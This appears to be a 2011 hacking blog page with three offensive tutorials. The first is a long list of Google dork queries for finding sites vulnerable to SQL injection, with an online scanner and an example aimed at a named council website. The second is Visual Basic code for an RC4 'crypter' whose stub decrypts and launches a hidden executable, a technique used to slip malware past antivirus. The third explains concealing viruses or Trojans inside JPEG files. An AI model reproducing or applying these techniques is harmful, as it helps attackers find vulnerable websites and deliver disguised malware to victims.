inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=

Quote:Use online sqli scanner (scan specific: websites/domains/countries)

Code:
www.xuhaid.com

How to: Scan specific websites

Just use it like this:
inurl:php?id=+site:[domain of website]

you can either change it like:
inurl:php?page=+site:[domain of website]
inurl:php?type=+site:[domain of website]

If by any chance it fail's just put inurl or allinurl instead of site, like this:
inurl:php?id=+inurl:[domain of website]
inurl:php?id=+allinurl:[domain of website]

Examples:

If you want to scan specif countries websites:
for example .pt websites:
inurl:php?type=+site:.pt
or .br:
inurl:php?type=+site:.br

If you want to scan: http://www.thurrock.gov.uk
use: inurl:php?=id+site:thurrock.gov.uk


Online Scanner V1 Credits : R3miCk

Online Scanner V2 Credits : R3miCk ( Edited By me )

Scan Specific Website Domain Credits : Hack.addict.pt

XuhaiD.com Index Page Credit's : th3-Outlaw Tools


Read More Add your Comment 2 comments


How To Make a crypter



How To Make a crypter ?
What you will need:
Visual Basic 6 or Visual Basic 6 Portable
A RC4 module
A brain


The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion

1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

How To Make a crypter


Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.


Code:
With commondlg 'CommonDialog1.
     .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
     .DialogTitle = "Please select a executable file..." 'The title of the dialog.
     .ShowOpen 'Show the dialog.
     End With
     TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.

Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.

Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.

MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.

Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.

Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.

Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5
RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398
read more at
http://hackguide4u.blogspot.com/2011/01/how-to-make-crypter.html


Read More Add your Comment 0 comments


Manually Hide any file in JPEG



Hello Friends, today i will explain you how to hide any file behind the JPEG image manually that is without any software. Its a very easy trick and also very useful if you want to send information secretly to your friend. Also its different from stenography as it does hides text behind images or text behind mp3 files. Its universal, you can hide any file, virus or Trojan or anything behind image using this trick


Things that you will need for this trick:
1. Winrar installed on your system.
2. Little knowledge of command prompt.


hide files, hide files in images,how to file virus,hiding trojans


Steps to Hide any File behind JPEG image Manually
 
1. Create an folder into C drive (recommendation is that use this C:\Hidden).

2. Now gather all files that you want to hide in this folder.

3. Now add these all files to compressed .rar file using winrar 
(example myhiddenfiles.rar ).
Note: This rar file should be in the same directory (i.e. C:\Hidden)

4. Now Select the JPEG file that you want to use to hide the above content 
(say myimage.jpg). Put this image file also in the same folder that is in C:\Hidden

5. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
  (When you open CMD you will get like C:\Documents and settings\username (something like this)
 Now type cd.. and press enter and then again type cd.. and press enter. Now you have something like this in cmd  C:\   . Now in front of that type cd "Hidden"  and press enter. )

6. Now type: “COPY /b myimage.jpg + myhiddenfiles.rar outputimage.jpg” (without quotes) - Now, myimage.jpg is the picture you want to show, myhiddenfiles.rar is the file to be hidden, and outputimage.jpg is the file which contains both....

7. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive...

This hack will help us to hide things behind the JPG file without any software. i hope you all have liked it. For more such hacks keep visiting.
http://hackguide4u.blogspot.com/2011/01/manually-hide-any-file-in-jpeg.html


Read More Add your Comment 1 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com